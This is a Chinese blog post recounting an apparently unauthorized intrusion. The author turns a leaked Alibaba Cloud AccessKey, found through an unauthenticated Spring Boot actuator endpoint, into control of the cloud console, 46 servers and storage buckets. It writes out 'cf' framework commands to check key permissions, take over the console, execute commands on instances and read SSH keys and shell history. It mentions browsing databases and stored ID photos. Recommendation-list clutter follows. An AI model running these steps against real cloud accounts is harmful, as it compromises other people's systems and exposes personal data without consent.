【漏洞案例】一次简单的“云“上野战记录

最新推荐文章于 2024-10-06 20:16:20 发布
最新推荐文章于 2024-10-06 20:16:20 发布
阅读量272 收藏
点赞数
分类专栏: 云安全 文章标签: java spring boot spring 安全 云原生
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39997829/article/details/131662642
版权

一次简单的”云”上野战记录

0x00 Springboot actuator开局

打点发现某系统存在springboot actuator未授权访问,看到一个神奇的oss接口,springboot未授权玩了这么多年,也是第一次碰到云的响应:

直接访问,AK到手:

 

0x01 一键接管?

配置AK:

cf config

查看当前AK的权限:

cf alibaba perm

 

一键接管控制台:

cf alibaba console

 

 

云上自带的扫描,可以看到有好多漏洞都未修复,相当于一堆靶场啊:

0x02 ECS利用

列出ECS:

 cf alibaba ecs ls

46台服务器到手(有几个stoped),直接命令三连,截图留证:

cf alibaba ecs exec -b

 

然后就是翻翻实例,看看能不能发现什么有用的信息。

root权限,直接开始捡漏,看到了公私钥,又一波免密登录机器到手:

cf alibaba ecs exec -i 实例ID -c "ls ~/.ssh"

cf alibaba ecs exec -i 实例ID -c "ls ~/.bash_history"

熟悉的味道,碰到了久违的k8s,拿下拿下:

cf alibaba ecs exec -i 实例ID -c "docker ps -a"

 

再看看数据库吧: 

 

 

 

0x03 OSS利用

内容比较多,直接oss浏览器连接查看,太多了,懒得翻了,一般会存一些照片(证件照?),备份库之类的:

 

 

安全大哥
关注
专栏目录
一次野战游戏作文.pdf
12-04
这篇作文虽然标题为“一次野战游戏”,但其核心讲述的是一次模拟军事演习的经历,从中我们可以提炼出一些与IT行业看似无关,但实际上可以借鉴的知识点: 1. **团队协作**:文中提到的分组作战、制定战术以及紧急...
幼儿园大班优秀游戏活动案例疯狂野战营.pdf
11-13
幼儿园大班优秀游戏活动案例疯狂野战营.pdf
一次heapdump泄露到拿下主机
m0_46371267的博客
12-08 2821
一次heapdump泄露到拿下主机
GitHub 星标 1.8K Star,这款多管理工具太赞了!
easylife206的专栏
03-03 392
公众号关注「奇妙的 Linux 世界」设为「星标」,每天带你玩转 Linux !今天要给大家推荐一个 GitHub 开源项目 teamssix/cf,该项目在 GitHub 有超过 1.8k Star,用一句话介绍该项目就是:“Cloud Exploitation Framework 环境利用框架,方便安全人员在获得 AK 的后续工作”。CF 是一个环境利用框架,适用于在红队场景中对上内网...
cf使用连接阿里
qq_59607911的博客
02-01 704
目前项目已闭源,工具仅靠遗留版本自行流传。
一次野战
2301_76467680的博客
06-28 92
fofa语法:存在漏洞的网址执行命令。
大数据决策的误区案例之一
12-15 309
影响一件事情因果关系的由多种条件:庞涓统计决策误区:没有考虑士兵锐气,以及伤员数据以及地理环境导致的天时地利,仅仅依靠数造坑单一因素,而丧失理智想捉住孙膑。这也是大数据统计分析容易出现的误区---只考虑影响事件的单一因素,导致丧命。   孙膑,战国中期齐国人。少时孤苦,年长后从师于鬼谷子,显示了惊人的军事才能,不料,他却因此遭人暗算。孙膑在从师鬼谷子学习兵法时,有一个师弟叫庞涓。庞涓的天资学...
2024版最新SRC漏洞挖掘思路手法(非常详细),零基础入门到精通,收藏这一篇就够了
shanguicsdn000的博客
09-09 880
这段时间挖掘了挺多的SRC漏洞,虽然都是一些水洞,也没有一些高级的漏洞挖掘利用手法,但是闲下来也算是总结一下,说说我对SRC漏洞挖掘的思路技巧。很多人可能都挖过很多漏洞其中包括一些EDU或者别的野战,但是对于SRC往往无从下手,感觉自己挖不倒SRC漏洞,这里其实最重要的问题还是自己的心理问题,当然必须还有一定的技术能力。很多都感觉自己挖那种大厂的漏洞都挖不倒,挖上一两个小时或者半个小时就不挖了,没什么进展,往往这种想法是错误的,其实对于一些src漏洞挖掘和别的站点漏洞挖掘都大差不大,但是为什么都感觉自己挖不
恭喜张童鞋,一位来自野战的最终却一次在咱这通过HCIE,对您或许会有点好处呢...
weixin_33973600的博客
12-20 435
首先感谢白老师和军哥超级上心、负责的辅导。 之所以会报名考取HCIE证书,是因为我的周围有一群我超级佩服的同事们,他们对待工作、家庭及自我要求的处事风格使我很佩服。在这样一种氛围内,我也有了学习的动力。 因为一直是自学,在HCIE面试前一个月的时候,我有点慌,加上工作有点忙,在工作和备考的高度紧张复杂的心情下,离考试时间越来越近了,我也越来越没自信了,在考试的前一周,我做了一个决定,如果有位老师辅...
SRC漏洞挖掘思路手法(非常详细),零基础入门到精通,收藏这一篇就够了_src漏洞挖掘会越来越窄吗
weixin_42340783的博客
06-11 722
这段时间挖掘了挺多的SRC漏洞,虽然都是一些水洞,也没有一些高级的漏洞挖掘利用手法,但是闲下来也算是总结一下,说说我对SRC漏洞挖掘的思路技巧。很多人可能都挖过很多漏洞其中包括一些EDU或者别的野战,但是对于SRC往往无从下手,感觉自己挖不倒SRC漏洞,这里其实最重要的问题还是自己的心理问题,当然必须还有一定的技术能力。很多都感觉自己挖那种大厂的漏洞都挖不倒,挖上一两个小时或者半个小时就不挖了,没什么进展,往往这种想法是错误的,其实对于一些src漏洞挖掘和别的站点漏洞挖掘都大差不大,但是为什么都感觉自己挖不
这一年,这些书:2022年读书笔记
热门推荐
Heartsuit的博客
12-31 3万+
Note: 以下 `markdown` 格式文本由 `json2md` 自动转换生成,可参考[JSON转Markdown:我把阅读数据从MongoDB中导出转换为.md了](https://blog.csdn.net/u013810234/article/details/113360229)了解具体的转换过程。2022年读书笔记
5G拉远第一小区频繁退服案例.docx
12-24
本文档详细记录了一个5G拉远第一小区频繁退服的案例,通过逐步排查,最终定位并解决了问题。 一、问题描述 在这个案例中,5G拉远第一小区反复出现服务中断,维护人员在机房现场发现告警信息显示为射频单元维护链路...
体育活动教学案例《丛林野战军》.doc
11-17
体育活动教学案例《丛林野战军》.doc
行业分类-设备装置-一种可分解野战办公箱.zip
08-29
标题中的“行业分类-设备装置-一种可分解野战办公箱”揭示了这个主题涉及到的是一个特定行业,可能属于军事、野外作业或是应急救援领域,其中的“设备装置”指的是用于该行业的一种特殊装备——可分解的野战办公箱。...
JDK1.0主要特性
最新发布
FoolRabbit的专栏
10-06 221
JDK1.0主要特性。
JavaScript ArrayBuffer的读写与类型转换
白瑕 的博客
10-01 462
所有视图的基本单位是ArrayBuffer, ArrayBuffer中只存储二进制格式的数据.ArrayBuffer不可直接读写, 必须通过视图(比如DataView)暴露的API.
java将word转pdf
紫月7575的博客
09-30 540
java将word转pdf
spring-boot 整合 mybatis
m0_72168501的博客
09-29 562
spring boot 整合 mybatis
轻型机步野战DTN通信策略:设计、验证与性能优化
本文主要探讨了"基于轻型机步野战场景的DTN通信策略设计与性能分析"这一主题,着重于在实际军事环境中,如何利用分布式拓扑网络(DTN, Delay Tolerance Network)来提高通信效率。作者倪辰辰、李千目、姜怡和查玄阅...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值